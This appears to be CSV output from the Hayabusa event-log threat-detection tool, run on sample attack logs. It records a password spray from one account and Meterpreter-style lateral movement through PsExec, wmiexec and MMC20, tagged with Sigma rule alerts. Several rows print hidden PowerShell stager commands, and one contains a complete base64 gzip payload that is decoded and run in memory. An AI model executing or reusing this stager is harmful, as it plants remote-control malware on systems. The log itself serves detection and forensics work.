Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target 
Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 
+09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c 
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1
xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command 
Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx 
